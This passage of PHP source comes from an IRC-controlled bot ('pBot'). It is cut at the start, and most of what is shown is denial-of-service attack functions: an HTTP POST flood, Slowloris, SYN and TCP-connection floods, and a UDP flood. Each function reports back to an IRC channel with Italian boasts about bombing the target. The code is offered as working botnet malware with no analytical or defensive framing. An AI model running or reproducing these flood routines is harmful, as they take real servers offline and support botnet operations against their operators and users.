$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>